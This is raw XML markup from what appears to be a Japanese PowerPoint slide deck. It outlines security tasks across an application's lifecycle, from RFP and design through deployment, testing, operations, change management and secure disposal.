            <a:t>(RFP)</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>と契約</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="1172687"/>
        <a:ext cx="1007027" cy="1146020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3467058" y="349876"/>
          <a:ext cx="103986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noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>開発者や社内の株主や例えばセキュリティ専門家と計画や設計を交渉する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>保護の必要性と予想される脅威レベルに応じたセキュリティアーキテクチャ、制御及び対策を定義する。定義するに当たっては、セキュリティ専門家がサポートをするべきである。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>アプリケーションオーナーが残存するリスクを受容するか、追加のリソースを提供する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>各スプリントにおいて、非機能要件に対して追加された制約を含むセキュリティストーリーを作成する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1322600" y="2595858"/>
        <a:ext cx="5328783" cy="938343"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2436885"/>
          <a:ext cx="1115983" cy="1256288"/>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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>計画と設計</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="2491363"/>
        <a:ext cx="1007027" cy="1147332"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3245070" y="1814904"/>
          <a:ext cx="1476358"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必要な権限を含む、アプリケーション、インタフェース、必要な全てのコンポネントのセキュアなデプロイを自動化する。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技術的な機能と</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>IT</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>アーキテクチャとの統合をテストし、ビジネステストを調整する。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技術的かつビジネス的な観点から、正常系と異常系のテストケースを作成する。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アプリケーションによる内部プロセス、保護の必要性、想定される脅威レベルに応じて、セキュリティテストを管理する。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アプリケーションを起動し、適宜以前に使用していたアプリケーションからの移行する。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構成管理データベース（</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>）やセキュリティアーキテクチャを含む、全ての文書を確定化する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1342817" y="3861297"/>
        <a:ext cx="5280864" cy="1332218"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3756874"/>
          <a:ext cx="1114893" cy="1541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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>デプロイ、テスト及び公開</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="3811299"/>
        <a:ext cx="1006043" cy="1432215"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3437204" y="3294149"/>
          <a:ext cx="1092090"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運用には、例えばパッチ管理といったアプリケーションのセキュリティ管理に関するガイドラインを含める。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>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利用者のセキュリティ意識を高め、セキュリティとユーザビリティのバランスを管理する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>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例えばアプリケーションや</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>OS</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>、ミドルウェア、ライブラリのバージョンアップに関する変更の計画と管理を実施する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>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変更管理データベースや運用手順書、プロジェクトに関する文書を含む全ての文書を更新する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1324058" y="5513917"/>
        <a:ext cx="5318382" cy="985468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="5361639"/>
          <a:ext cx="1114893" cy="12900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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>運用及びチェンジマネジメント</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="5416064"/>
        <a:ext cx="1006043" cy="1181173"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3670566" y="4395741"/>
          <a:ext cx="632850"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必要なデータを全てアーカイブし、その他のデータを全て安全に消去する。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未使用のアカウント、役割、権限の削除などを実施し、アプリケーションを安全に廃棄する。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>構成管理データベースにおいてアプリケーションのステータスを廃棄にする。</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1302731" y="6825362"/>
        <a:ext cx="5368521" cy="571064"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6715363"/>
          <a:ext cx="1115983" cy="79106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ja-JP" altLang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>システムの廃棄</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="194471" y="6753980"/>
        <a:ext cx="1038749" cy="71382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85171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901501" y="2"/>
            <a:ext cx="2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>26.12.17</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="9516788"/>
            <a:ext cx="2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901501" y="9516788"/>
            <a:ext cx="2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112"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84872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901702" y="4"/>
            <a:ext cx="2984872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/26/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144713" y="752475"/>
            <a:ext cx="2598737" cy="3756025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758891"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="575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42"/>
            <a:ext cx="2984872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901702" y="9516042"/>
            <a:ext cx="2984872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531"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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2468784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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17043823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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2031763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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393771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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1362651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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794629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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4182584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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2330313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3600" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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000" b="1" i="0" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="11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3600" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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000" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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4224057118"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="2239082"/>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55">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="10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27">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700" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>アプリケーションによる</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
